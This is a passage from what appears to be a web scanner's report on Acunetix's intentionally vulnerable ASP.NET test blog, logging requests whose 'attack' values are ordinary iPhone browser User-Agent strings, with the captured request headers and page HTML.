value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 461 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:18 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Show / hide Request and Response
Request Header - size: 466 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:18 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a 